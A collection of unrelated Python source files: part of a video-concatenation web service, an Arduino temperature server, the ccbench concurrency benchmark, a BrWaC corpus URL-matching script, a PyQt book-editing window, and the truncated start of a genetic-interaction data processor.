self.response.out.write(type(ex).__name__ + str(ex))
def post(self):
self.get() # redirect to get()
def concat_files(sequence, result_file_name):
my_h264_worker = worker.RenderWorker(codecflag='-crf 18 -preset veryfast')
my_h264_worker.add_handler(handler=ScreenReporter('screen_reporter'))
file_name_list = []
for each in sequence:
real_file_name = each['src'] if '.mp4' in each[
'src'] else each['src'] + '.mp4'
real_file_name = videos_folder + real_file_name
if 'start' not in each:
file_name_list.append(real_file_name)
else: # need to trim
trimed_file_name = '%s-%s-%s.mp4' % (each['src'].split('-')[0],
each['start'], each['end'])
trimed_file_name = videos_folder + trimed_file_name
my_h264_worker.trim(real_file_name, each['start'], each['end'],
trimed_file_name, 30)
file_name_list.append(trimed_file_name)
return my_h264_worker.concat(file_name_list, result_file_name)
class ConcatFiles(webapp2.RequestHandler):
def get(self):
try:
jsonstring = self.request.body
payload = json.loads(jsonstring)
if payload:
sequence = payload['sequence']
now = datetime.datetime.now()
str_now = datetime.datetime.strftime(now, '%Y%m%d-%H%M%S')
result_file_name = 'demo-' + str_now + '.mp4'
success = concat_files(sequence,
videos_folder + result_file_name)
return_dict = {}
return_dict['result_file_name'] = result_file_name
return_dict['success'] = success
self.response.out.write(json.dumps(return_dict))
else:
self.error(400)
self.response.out.write('Payload Empty, Check Your Json.')
except Exception as ex:
self.error(400)
self.response.out.write(type(ex).__name__ + str(ex))
def post(self):
self.get() # redirect to get()
app = webapp2.WSGIApplication(
[
('/app/render', RenderSingleCake),
('/app/concat', ConcatFiles),
],
debug=True,
config=config)
def main():
httpserver.serve(app, host='0.0.0.0', port='8080')
if __name__ == '__main__':
main()
|
slushserver.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import cherrypy
import serial
import io
import threading
import simplejson as json
import os
temperature = [ 0,0,0 ]
def arduinoReceive():
global temperature
serialIn = serial.Serial('/dev/ttyACM0', 9600, bytesize=8, parity='N', stopbits=1, timeout=0)
sio = io.TextIOWrapper(io.BufferedRWPair(serialIn, serialIn))
while True:
line = sio.readline()
if ";" in line:
temperature_temp = line.rstrip().split(";")
try:
temperature = map(float, temperature_temp)
except ValueError:
pass
class SlushServer(object):
@cherrypy.expose
def api(self):
cherrypy.response.headers['Content-Type']= 'application/json'
return json.dumps({"temperature": temperature})
_thread = threading.Thread(target=arduinoReceive)
_thread.setDaemon(True)
_thread.start()
current_dir = os.path.dirname(os.path.abspath(__file__))
conf = {'global': {'server.socket_host': '0.0.0.0',
'server.socket_port': 8080,
'tools.encode.on': True,
'tools.encode.encoding': "utf-8" },
'/index': { 'tools.staticfile.on': True,
'tools.staticfile.filename': os.path.join(current_dir, 'index.html')},
'/static': {'tools.staticdir.on': True,
'tools.staticdir.dir': os.path.join(current_dir, 'static'),
'tools.staticdir.content_types': {'js': 'text/javascript',
'css': 'text/css'}}}
#cherrypy.server.socket_host = "0.0.0.0";
cherrypy.quickstart(SlushServer(), config = conf )
|
ccbench.py
|
# This file should be kept compatible with both Python 2.6 and Python >= 3.0.
from __future__ import division
from __future__ import print_function
"""
ccbench, a Python concurrency benchmark.
"""
import time
import os
import sys
import functools
import itertools
import threading
import subprocess
import socket
from optparse import OptionParser, SUPPRESS_HELP
import platform
# Compatibility
try:
xrange
except NameError:
xrange = range
try:
map = itertools.imap
except AttributeError:
pass
THROUGHPUT_DURATION = 2.0
LATENCY_PING_INTERVAL = 0.1
LATENCY_DURATION = 2.0
BANDWIDTH_PACKET_SIZE = 1024
BANDWIDTH_DURATION = 2.0
def task_pidigits():
"""Pi calculation (Python)"""
_map = map
_count = itertools.count
_islice = itertools.islice
def calc_ndigits(n):
# From http://shootout.alioth.debian.org/
def gen_x():
return _map(lambda k: (k, 4*k + 2, 0, 2*k + 1), _count(1))
def compose(a, b):
aq, ar, as_, at = a
bq, br, bs, bt = b
return (aq * bq,
aq * br + ar * bt,
as_ * bq + at * bs,
as_ * br + at * bt)
def extract(z, j):
q, r, s, t = z
return (q*j + r) // (s*j + t)
def pi_digits():
z = (1, 0, 0, 1)
x = gen_x()
while 1:
y = extract(z, 3)
while y != extract(z, 4):
z = compose(z, next(x))
y = extract(z, 3)
z = compose((10, -10*y, 0, 1), z)
yield y
return list(_islice(pi_digits(), n))
return calc_ndigits, (50, )
def task_regex():
"""regular expression (C)"""
# XXX this task gives horrendous latency results.
import re
# Taken from the `inspect` module
pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)', re.MULTILINE)
with open(__file__, "r") as f:
arg = f.read(2000)
def findall(s):
t = time.time()
try:
return pat.findall(s)
finally:
print(time.time() - t)
return pat.findall, (arg, )
def task_sort():
"""list sorting (C)"""
def list_sort(l):
l = l[::-1]
l.sort()
return list_sort, (list(range(1000)), )
def task_compress_zlib():
"""zlib compression (C)"""
import zlib
with open(__file__, "rb") as f:
arg = f.read(5000) * 3
def compress(s):
zlib.decompress(zlib.compress(s, 5))
return compress, (arg, )
def task_compress_bz2():
"""bz2 compression (C)"""
import bz2
with open(__file__, "rb") as f:
arg = f.read(3000) * 2
def compress(s):
bz2.compress(s)
return compress, (arg, )
def task_hashing():
"""SHA1 hashing (C)"""
import hashlib
with open(__file__, "rb") as f:
arg = f.read(5000) * 30
def compute(s):
hashlib.sha1(s).digest()
return compute, (arg, )
throughput_tasks = [task_pidigits, task_regex]
for mod in 'bz2', 'hashlib':
try:
globals()[mod] = __import__(mod)
except ImportError:
globals()[mod] = None
# For whatever reasons, zlib gives irregular results, so we prefer bz2 or
# hashlib if available.
# (NOTE: hashlib releases the GIL from 2.7 and 3.1 onwards)
if bz2 is not None:
throughput_tasks.append(task_compress_bz2)
elif hashlib is not None:
throughput_tasks.append(task_hashing)
else:
throughput_tasks.append(task_compress_zlib)
latency_tasks = throughput_tasks
bandwidth_tasks = [task_pidigits]
class TimedLoop:
def __init__(self, func, args):
self.func = func
self.args = args
def __call__(self, start_time, min_duration, end_event, do_yield=False):
step = 20
niters = 0
duration = 0.0
_time = time.time
_sleep = time.sleep
_func = self.func
_args = self.args
t1 = start_time
while True:
for i in range(step):
_func(*_args)
t2 = _time()
# If another thread terminated, the current measurement is invalid
# => return the previous one.
if end_event:
return niters, duration
niters += step
duration = t2 - start_time
if duration >= min_duration:
end_event.append(None)
return niters, duration
if t2 - t1 < 0.01:
# Minimize interference of measurement on overall runtime
step = step * 3 // 2
elif do_yield:
# OS scheduling of Python threads is sometimes so bad that we
# have to force thread switching ourselves, otherwise we get
# completely useless results.
_sleep(0.0001)
t1 = t2
def run_throughput_test(func, args, nthreads):
assert nthreads >= 1
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
end_event = []
if nthreads == 1:
# Pure single-threaded performance, without any switching or
# synchronization overhead.
start_time = time.time()
results.append(loop(start_time, THROUGHPUT_DURATION,
end_event, do_yield=False))
return results
started = False
ready_cond = threading.Condition()
start_cond = threading.Condition()
ready = []
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
results.append(loop(start_time, THROUGHPUT_DURATION,
end_event, do_yield=True))
threads = []
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# We don't want measurements to include thread startup overhead,
# so we arrange for timing to start after all threads are ready.
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
with start_cond:
start_time = time.time()
started = True
start_cond.notify(nthreads)
for t in threads:
t.join()
return results
def run_throughput_tests(max_threads):
for task in throughput_tasks:
print(task.__doc__)
print()
func, args = task()
nthreads = 1
baseline_speed = None
while nthreads <= max_threads:
results = run_throughput_test(func, args, nthreads)
# Taking the max duration rather than average gives pessimistic
# results rather than optimistic.
speed = sum(r[0] for r in results) / max(r[1] for r in results)
print("threads=%d: %d" % (nthreads, speed), end="")
if baseline_speed is None:
print(" iterations/s.")
baseline_speed = speed
else:
print(" ( %d %%)" % (speed / baseline_speed * 100))
nthreads += 1
print()
LAT_END = "END"
def _sendto(sock, s, addr):
sock.sendto(s.encode('ascii'), addr)
def _recv(sock, n):
return sock.recv(n).decode('ascii')
def latency_client(addr, nb_pings, interval):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
_time = time.time
_sleep = time.sleep
def _ping():
_sendto(sock, "%r\n" % _time(), addr)
# The first ping signals the parent process that we are ready.
_ping()
# We give the parent a bit of time to notice.
_sleep(1.0)
for i in range(nb_pings):
_sleep(interval)
_ping()
_sendto(sock, LAT_END + "\n", addr)
finally:
sock.close()
def run_latency_client(**kwargs):
cmd_line = [sys.executable, '-E', os.path.abspath(__file__)]
cmd_line.extend(['--latclient', repr(kwargs)])
return subprocess.Popen(cmd_line) #, stdin=subprocess.PIPE,
#stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def run_latency_test(func, args, nthreads):
# Create a listening socket to receive the pings. We use UDP which should
# be painlessly cross-platform.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
addr = sock.getsockname()
interval = LATENCY_PING_INTERVAL
duration = LATENCY_DURATION
nb_pings = int(duration / interval)
results = []
threads = []
end_event = []
start_cond = threading.Condition()
started = False
if nthreads > 0:
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
ready = []
ready_cond = threading.Condition()
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
loop(start_time, duration * 1.5, end_event, do_yield=False)
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# Wait for threads to be ready
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
# Run the client and wait for the first ping(s) to arrive before
# unblocking the background threads.
chunks = []
process = run_latency_client(addr=sock.getsockname(),
nb_pings=nb_pings, interval=interval)
s = _recv(sock, 4096)
_time = time.time
with start_cond:
start_time = _time()
started = True
start_cond.notify(nthreads)
while LAT_END not in s:
s = _recv(sock, 4096)
t = _time()
chunks.append((t, s))
# Tell the background threads to stop.
end_event.append(None)
for t in threads:
t.join()
process.wait()
sock.close()
for recv_time, chunk in chunks:
# NOTE: it is assumed that a line sent by a client wasn't received
# in two chunks because the lines are very small.
for line in chunk.splitlines():
line = line.strip()
if line and line != LAT_END:
send_time = eval(line)
assert isinstance(send_time, float)
results.append((send_time, recv_time))
return results
def run_latency_tests(max_threads):
for task in latency_tasks:
print("Background CPU task:", task.__doc__)
print()
func, args = task()
nthreads = 0
while nthreads <= max_threads:
results = run_latency_test(func, args, nthreads)
n = len(results)
# We print out milliseconds
lats = [1000 * (t2 - t1) for (t1, t2) in results]
#print(list(map(int, lats)))
avg = sum(lats) / n
dev = (sum((x - avg) ** 2 for x in lats) / n) ** 0.5
print("CPU threads=%d: %d ms. (std dev: %d ms.)" % (nthreads, avg, dev), end="")
print()
#print(" [... from %d samples]" % n)
nthreads += 1
print()
BW_END = "END"
def bandwidth_client(addr, packet_size, duration):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
local_addr = sock.getsockname()
_time = time.time
_sleep = time.sleep
def _send_chunk(msg):
_sendto(sock, ("%r#%s\n" % (local_addr, msg)).rjust(packet_size), addr)
# We give the parent some time to be ready.
_sleep(1.0)
try:
start_time = _time()
end_time = start_time + duration * 2.0
i = 0
while _time() < end_time:
_send_chunk(str(i))
s = _recv(sock, packet_size)
assert len(s) == packet_size
i += 1
_send_chunk(BW_END)
finally:
sock.close()
def run_bandwidth_client(**kwargs):
cmd_line = [sys.executable, '-E', os.path.abspath(__file__)]
cmd_line.extend(['--bwclient', repr(kwargs)])
return subprocess.Popen(cmd_line) #, stdin=subprocess.PIPE,
#stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def run_bandwidth_test(func, args, nthreads):
# Create a listening socket to receive the packets. We use UDP which should
# be painlessly cross-platform.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
addr = sock.getsockname()
duration = BANDWIDTH_DURATION
packet_size = BANDWIDTH_PACKET_SIZE
results = []
threads = []
end_event = []
start_cond = threading.Condition()
started = False
if nthreads > 0:
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
ready = []
ready_cond = threading.Condition()
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
loop(start_time, duration * 1.5, end_event, do_yield=False)
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# Wait for threads to be ready
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
# Run the client and wait for the first packet to arrive before
# unblocking the background threads.
process = run_bandwidth_client(addr=addr,
packet_size=packet_size,
duration=duration)
_time = time.time
# This will also wait for the parent to be ready
s = _recv(sock, packet_size)
remote_addr = eval(s.partition('#')[0])
with start_cond:
start_time = _time()
started = True
start_cond.notify(nthreads)
n = 0
first_time = None
while not end_event and BW_END not in s:
_sendto(sock, s, remote_addr)
s = _recv(sock, packet_size)
if first_time is None:
first_time = _time()
n += 1
end_time = _time()
end_event.append(None)
for t in threads:
t.join()
process.kill()
return (n - 1) / (end_time - first_time)
def run_bandwidth_tests(max_threads):
for task in bandwidth_tasks:
print("Background CPU task:", task.__doc__)
print()
func, args = task()
nthreads = 0
baseline_speed = None
while nthreads <= max_threads:
results = run_bandwidth_test(func, args, nthreads)
speed = results
#speed = len(results) * 1.0 / results[-1][0]
print("CPU threads=%d: %.1f" % (nthreads, speed), end="")
if baseline_speed is None:
print(" packets/s.")
baseline_speed = speed
else:
print(" ( %d %%)" % (speed / baseline_speed * 100))
nthreads += 1
print()
def main():
usage = "usage: %prog [-h|--help] [options]"
parser = OptionParser(usage=usage)
parser.add_option("-t", "--throughput",
action="store_true", dest="throughput", default=False,
help="run throughput tests")
parser.add_option("-l", "--latency",
action="store_true", dest="latency", default=False,
help="run latency tests")
parser.add_option("-b", "--bandwidth",
action="store_true", dest="bandwidth", default=False,
help="run I/O bandwidth tests")
parser.add_option("-i", "--interval",
action="store", type="int", dest="check_interval", default=None,
help="sys.setcheckinterval() value")
parser.add_option("-I", "--switch-interval",
action="store", type="float", dest="switch_interval", default=None,
help="sys.setswitchinterval() value")
parser.add_option("-n", "--num-threads",
action="store", type="int", dest="nthreads", default=4,
help="max number of threads in tests")
# Hidden option to run the pinging and bandwidth clients
parser.add_option("", "--latclient",
action="store", dest="latclient", default=None,
help=SUPPRESS_HELP)
parser.add_option("", "--bwclient",
action="store", dest="bwclient", default=None,
help=SUPPRESS_HELP)
options, args = parser.parse_args()
if args:
parser.error("unexpected arguments")
if options.latclient:
kwargs = eval(options.latclient)
latency_client(**kwargs)
return
if options.bwclient:
kwargs = eval(options.bwclient)
bandwidth_client(**kwargs)
return
if not options.throughput and not options.latency and not options.bandwidth:
options.throughput = options.latency = options.bandwidth = True
if options.check_interval:
sys.setcheckinterval(options.check_interval)
if options.switch_interval:
sys.setswitchinterval(options.switch_interval)
print("== %s %s (%s) ==" % (
platform.python_implementation(),
platform.python_version(),
platform.python_build()[0],
))
# Processor identification often has repeated spaces
cpu = ' '.join(platform.processor().split())
print("== %s %s on '%s' ==" % (
platform.machine(),
platform.system(),
cpu,
))
print()
if options.throughput:
print("--- Throughput ---")
print()
run_throughput_tests(options.nthreads)
if options.latency:
print("--- Latency ---")
print()
run_latency_tests(options.nthreads)
if options.bandwidth:
print("--- I/O bandwidth ---")
print()
run_bandwidth_tests(options.nthreads)
if __name__ == "__main__":
main()
|
get_brwac_urls.py
|
import json
import lxml.etree as ET
from codecs import open
import argparse
from os import listdir
from os.path import isfile, join
from nltk import word_tokenize
from hash_tools import HashTable
def read_brwac_docs(buffer):
#print(buffer)
last_doc_close_pos = buffer.rindex('</doc>')
buffer_out = buffer[last_doc_close_pos + 6:]
xml = '<root> ' + buffer[:last_doc_close_pos + 6].replace('<g/>', '').replace('\n', ' ').replace('<p>', '').replace('</p>', '\n') + ' </root>'
parser = ET.XMLParser(encoding="utf-8", recover='True')
tree = ET.fromstring(xml.encode('utf-8'), parser=parser)
docs = tree.findall('doc')
return docs, buffer_out
def search_on_doc(text, web_title, web_text):
try:
lower_text = text.lower()
lower_title = web_title.lower()
lower_web_text = web_text.lower()
if lower_text in lower_title or lower_text in lower_web_text:
#print(lower_text)
#print(lower_title)
#if('anno domini' in lower_text):
# print(lower_text)
return True
return False
except:
return False
def search_on_brwac(wiki_ids, wiki_titles, brwac_file_path):
hash_table = HashTable(200)
wiki_urls = []
for wiki_id in wiki_ids:
wiki_urls.append({'id' : wiki_id, 'urls' : []})
buffer_size = 100000000
total_size = int(22000000000/buffer_size)
with open(brwac_file_path, 'r', encoding="utf-8") as file:
buffer = file.read(buffer_size)
i = 0
while(len(buffer) > 5):
docs, buffer = read_brwac_docs(buffer)
if(docs is not None):
for doc in docs:
for j in range(len(wiki_ids)):
sentences = doc.findall('s')
full_text = ''
ss = []
for sentence in sentences:
ss.append(sentence.text)
full_text = full_text + sentence.text
if(search_on_doc(wiki_titles[j], doc.attrib['title'], full_text)):
if('uri' in doc.attrib):
if('wikipedia' not in doc.attrib['uri']):
if(doc.attrib['uri'] not in wiki_urls[j]['urls']):
#wiki_urls[j]['urls'].append(doc.attrib['uri'])
hash_table.set_val(doc.attrib['uri'], ss)
#print(ss)
wiki_urls[j]['urls'].append(doc.attrib['uri'])
#wiki_urls[j]['texts'].append(doc.text)
buffer = buffer + file.read(buffer_size)
print('{}/{} - buffer size: {}'.format(i, total_size, len(buffer)))
i = i + 1
#if(i==50):
# break
return wiki_urls, hash_table
def main(args):
wiki_titles = []
wiki_ids = []
with open(args.wiki_path + args.wiki_file, 'r', encoding="utf-8") as file:
for line in file:
content = json.loads(line)
wiki_titles.append(content['title'])
wiki_ids.append(content['id'])
brwac_wiki_urls_dicts, hash_table = search_on_brwac(wiki_ids, wiki_titles, args.brwac_file)
with open(args.wiki_urls_output_path + args.wiki_file, 'wb') as out_file:
for wiki in brwac_wiki_urls_dicts:
out_file.write('{}\n'.format(json.dumps(wiki, ensure_ascii=False)).encode('utf-8'))
serialized_urls = []
try:
with open("{}serialized_urls_list.txt".format(args.urls_sentences_output_path), 'r') as file:
for line in file:
serialized_urls.append(line.replace('\n', ''))
except:
pass
new_urls = []
for i in range(len(hash_table.hash_table)):
with open("{}{:03d}.json".format(args.urls_sentences_output_path, i), 'ab+') as out_file:
for url, sentences in hash_table.hash_table[i]:
if(url not in serialized_urls):
new_urls.append(url)
url_dict = {'url' : url, 'sentences' : sentences}
out_file.write('{}\n'.format(json.dumps(url_dict, ensure_ascii=False)).encode('utf-8'))
with open("{}serialized_urls_list.txt".format(args.urls_sentences_output_path), 'a+') as file:
for url in new_urls:
file.write('{}\n'.format(url))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generate Wikisum-pt dataset from Wikipedia articles and BrWac corpus.')
parser.add_argument('--workers', help='number of threads to perform web searchs in parallel', default=1, type=int)
parser.add_argument('--batch_size', help='batch of articles between storages', default=10, type=int)
parser.add_argument('--brwac_file', default='data/brwac/brwac-dec13.vert', type=str)
parser.add_argument('--wiki_path', default='data/wikipedia_articles_json/', type=str)
parser.add_argument('--wiki_file', default='AA/processed_wiki_00.json', type=str)
parser.add_argument('--wiki_urls_output_path', default='data/wikipedia_ref_urls_brwac/', type=str)
parser.add_argument('--urls_sentences_output_path', default='data/brwac_ref_urls_sentences/', type=str)
args = parser.parse_args()
# turn-on the worker thread
#for i in range(args.workers):
# threading.Thread(target=worker, daemon=True).start()
main(args)
|
book_edit_window.py
|
"""
coding:utf-8
file: book_edit_window.py
@author: jiangwei
@contact: [email protected]
@time: 2020/5/10 9:12
@desc:
"""
from threading import Thread
from PyQt5.QtCore import Qt, pyqtSignal
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QWidget
from ui.add_book_window import Ui_Form
from util.dbutil import DBHelp
from util.common_util import msg_box, APP_ICON, SYS_STYLE
class BookEditWindow(Ui_Form, QWidget):
init_book_info_done_signal = pyqtSignal()
def __init__(self, book_info=None):
super(BookEditWindow, self).__init__()
self.setupUi(self)
self.book_info = book_info
self.init_ui()
self.current_book_info = list()
self.init_book_info_done_signal.connect(self.init_data)
self.add_book_pushButton.clicked.connect(self.update_book_info)
th = Thread(target=self.get_book_info)
th.start()
def init_ui(self):
self.setWindowTitle('编辑图书')
self.setWindowModality(Qt.ApplicationModal)
self.add_book_pushButton.setText('保存信息')
self.setWindowIcon(QIcon(APP_ICON))
self.setWindowFlags(Qt.WindowCloseButtonHint)
self.add_book_pushButton.setProperty('class', 'Aqua')
self.setStyleSheet(SYS_STYLE)
self.add_book_pushButton.setMinimumWidth(60)
def init_data(self):
self.book_name_lineEdit.setText(self.current_book_info[1])
self.author_lineEdit.setText(self.current_book_info[2])
self.publish_company_lineEdit.setText(self.current_book_info[3])
self.publish_date_lineEdit.setText(str(self.current_book_info[-1]))
self.store_num_lineEdit.setText(str(self.current_book_info[4]))
def get_book_info(self):
db = DBHelp()
count, res = db.query_super(table_name='book', column_name='booK_name', condition=self.book_info)
self.current_book_info = list(res[0])
self.init_book_info_done_signal.emit()
db.instance = None
del db
def update_book_info(self):
book_name = self.book_name_lineEdit.text()
author = self.author_lineEdit.text()
publish_company = self.publish_company_lineEdit.text()
publish_time = self.publish_date_lineEdit.text()
store_num = int(self.store_num_lineEdit.text())
new_book_info = [book_name, author, publish_company, publish_time, store_num]
is_update = False
if '' in new_book_info:
msg_box(self, '错误', '图书的关键信息不能为空!')
return
for new_info in new_book_info:
if new_info not in self.current_book_info:
db = DBHelp()
db.update_super(table_name='book', column_name='id', condition=self.current_book_info[0],
data=new_book_info)
db.db_commit()
db.instance = None
del db
self.close()
is_update = True
if is_update:
msg_box(self, '提示', '图书信息更新成功!')
self.close()
|
interaction_genetic_processor.py
|
import logging
import multiprocessing
import csv
import re
import json
import os
import sys
import urllib.request
from tqdm import tqdm
from datetime import datetime
from string import Template
from processor import Processor
logger = logging.getLogger(__name__)
class HeaderTemplate(Template):
delimiter = '%'
class InteractionGeneticProcessor(Processor):
def __init__(self, configs):
super().__init__()
self.data_type_configs = configs
self.master_gene_set = set()
self.master_crossreference_dictionary = dict()
self.master_crossreference_dictionary['UniProtKB'] = dict()
self.master_crossreference_dictionary['ENSEMBL'] = dict()
self.master_crossreference_dictionary['NCBI_Gene'] = dict()
self.output_dir = '/usr/src/app/output/'
self.download_dir = '/usr/src/app/download_genetic/'
def _load_and_process_data(self):
logger.debug("in InteractionGeneticProcessor")
source_filepaths = dict()
interaction_source_config = self.data_type_configs[0]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
source_filepaths[sub_type_name] = sub_type_filepath
for sub_type in source_filepaths:
logger.debug("Source subtype %s filepath %s" % (sub_type, source_filepaths[sub_type]))
bgi_filepaths = dict()
interaction_source_config = self.data_type_configs[1]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
bgi_filepaths[sub_type_name] = sub_type_filepath
for sub_type in bgi_filepaths:
logger.debug("BGI subtype %s filepath %s" % (sub_type, bgi_filepaths[sub_type]))
interactions_genetic = InteractionGeneticProcessor(self.data_type_configs)
interactions_genetic.parse_bgi_json()
interactions_genetic.get_data()
interactions_genetic.validate_and_upload_files_to_fms()
def parse_bgi_json(self):
# We're populating a rather large dictionary to use for looking up Alliance genes by their crossreferences.
# Edit the list below if you'd like to add more crossreferences to the dictionary.
# The key of the dictionary is the crossreference and the value is the Alliance gene to which it resolves.
#
# We're also populating the "master gene set" for gene lookups later.
logger.info('Populating master gene set and crossreferences from JSON.')
bgi_filepaths = dict()
interaction_source_config = self.data_type_configs[1]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
bgi_filepaths[sub_type_name] = sub_type_filepath
for sub_type in bgi_filepaths:
logger.info("BGI subtype %s filepath %s" % (sub_type, bgi_filepaths[sub_type]))
filepath = bgi_filepaths[sub_type]
with open(filepath) as json_file:
data = json.load(json_file)
logger.info('Scanning {}'.format(filepath))
# for local runs, to see progress
# for item in tqdm(data['data']):
for item in data['data']:
gene_identifier = item['basicGeneticEntity']['primaryId']
self.master_gene_set.add(gene_identifier)
for xref in item['basicGeneticEntity']['crossReferences']:
cross_ref_record = None
cross_ref_prefix = None
if xref['id'].startswith('NCBI_Gene'):
# Modify the cross reference ID to match the PSI MITAB format if necessary.
# So far, this is just converting 'NCBI_Gene' to 'entrez gene/locuslink'.
cross_ref_prefix = 'NCBI_Gene'
cross_ref_record_split = xref['id'].split(':')[1]
cross_ref_record = 'entrez gene/locuslink:' + cross_ref_record_split
elif xref['id'].startswith('UniProtKB'):
cross_ref_prefix = 'UniProtKB'
cross_ref_record = xref['id']
elif xref['id'].startswith('ENSEMBL'):
cross_ref_prefix = 'ENSEMBL'
cross_ref_record = xref['id']
# The crossreference dictionary is a list of genes linked to a single crossreference.
# Append the gene if the crossref dict entry exists.
# Otherwise, create a list and append the entry.
if cross_ref_record is not None:
if cross_ref_record.lower() in self.master_crossreference_dictionary[cross_ref_prefix]:
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()]\
.append(gene_identifier)
else:
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()] = []
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()].append(
gene_identifier)
# The ids in PSI-MITAB files are lower case, hence the .lower() used above.
logger.info('Done.')
def resolve_identifiers_by_row(self, row, mapped_out):
interactor_A_rows = [0, 2, 4, 22]
interactor_B_rows = [1, 3, 5, 23]
interactor_A_resolved = False
interactor_B_resolved = False
for row_entry in interactor_A_rows:
try:
interactor_A_resolved, A_resolved_id = self.resolve_identifier(row[row_entry])
if interactor_A_resolved is True:
logger.debug('interactor_A_resolved True : %s' % (A_resolved_id))
break
except IndexError: # Biogrid has less rows than other files, continue on IndexErrors.
continue
for row_entry in interactor_B_rows:
try:
interactor_B_resolved, B_resolved_id = self.resolve_identifier(row[row_entry])
if interactor_B_resolved is True:
logger.debug('interactor_B_resolved True : %s' % (B_resolved_id))
break
except IndexError: # Biogrid has less rows than other files, continue on IndexErrors.
continue
if A_resolved_id is not None and B_resolved_id is not None:
mapped_output_rows = [row[13], A_resolved_id, B_resolved_id]
mapped_out.writerow(mapped_output_rows)
return interactor_A_resolved, interactor_B_resolved
def resolve_identifier(self, row_entry):
logger.debug('resolving: %s' % (row_entry))
list_of_crossref_regex_to_search = [
'uniprotkb:[\\w\\d_-]*$',
'ensembl:[\\w\\d_-]*$',
'entrez gene/locuslink:.*$'
]
# If we're dealing with multiple identifiers separated by a pipe.
if '|' in row_entry:
row_entries = row_entry.split('|')
else:
row_entries = [row_entry]
for individual_entry in row_entries:
logger.debug('resolving individual_entry : %s' % (individual_entry))
# For use in wormbase / flybase lookups.
# If we run into an IndexError, there's no identifier to resolve and we return False.
try:
entry_stripped = individual_entry.split(':')[1]
except IndexError:
return False, None
# uniprotkb: could have trailing '-<something>' that should be stripped
if individual_entry.startswith('uniprotkb:'):
individual_entry = individual_entry.split('-')[0]
prefixed_identifier = None
if entry_stripped.startswith('WB'):
prefixed_identifier = 'WB:' + entry_stripped
if prefixed_identifier in self.master_gene_set:
return True, prefixed_identifier
else:
logger.debug('resolved WB False : ' + prefixed_identifier)
return False, None
elif entry_stripped.startswith('FB'):
prefixed_identifier = 'FB:' + entry_stripped
if prefixed_identifier in self.master_gene_set:
logger.debug('resolved FB False : ' + prefixed_identifier)
return True, prefixed_identifier
else:
return False, None
for regex_entry in list_of_crossref_regex_to_search:
regex_output = re.findall(regex_entry, individual_entry)
if regex_output is not None:
for regex_match in regex_output: # We might have multiple regex matches. Search them all against our crossreferences.
identifier = regex_match
for crossreference_type in self.master_crossreference_dictionary.keys():
# Using lowercase in the identifier to be consistent with Alliance lowercase identifiers.
if identifier.lower() in self.master_crossreference_dictionary[crossreference_type]:
return True, identifier.lower() # Return 'True' if we find an entry.
# If we can't resolve any of the crossReferences, return None
logger.debug('resolved default False : ' + row_entry)
return False, None
def unzip_to_filename(self, filename_zip, filename):
logger.info('Extracting file {} with unzip into {}'.format(filename_zip, filename))
os.system('unzip -o {} -d {}tmp/'.format(filename_zip, self.download_dir))
logger.info('Renaming extracted file.')
os.system('mv {}tmp/* {}'.format(self.download_dir, filename))
def get_data(self):
approved_col12 = (
# these three values were removed and replaced with the MI:2368-MI:2378 values 2021 03 19
# 'psi-mi:"MI:0794"(synthetic genetic interaction defined by inequality)',
# 'psi-mi:"MI:0796"(suppressive genetic interaction defined by inequality)',
# 'psi-mi:"MI:0799"(additive genetic interaction defined by inequality)',
'psi-mi:"MI:2368"("phenotypic enhancement (sensu biogrid)")',
'psi-mi:"MI:2369"("synthetic growth defect (sensu biogrid)")',
'psi-mi:"MI:2370"("synthetic lethality (sensu biogrid)")',
'psi-mi:"MI:2371"("positive genetic interaction (sensu biogrid)")',
'psi-mi:"MI:2372"("synthetic haploinsufficiency (sensu biogrid)")',
'psi-mi:"MI:2373"("negative genetic interaction (sensu biogrid)")',
'psi-mi:"MI:2374"("phenotypic suppression (sensu biogrid)")',
'psi-mi:"MI:2375"("synthetic rescue (sensu biogrid)")',
'psi-mi:"MI:2376"("dosage rescue (sensu biogrid)")',
'psi-mi:"MI:2377"("dosage lethality (sensu biogrid)")',
'psi-mi:"MI:2378"("dosage growth defect (sensu biogrid)")')
genetic_interaction_terms = {
'Dosage Growth Defect': {
'12': 'psi-mi:"MI:2378"(dosage growth defect (sensu biogrid))',
'19': '-', '20': '-' },
'Dosage Lethality': {
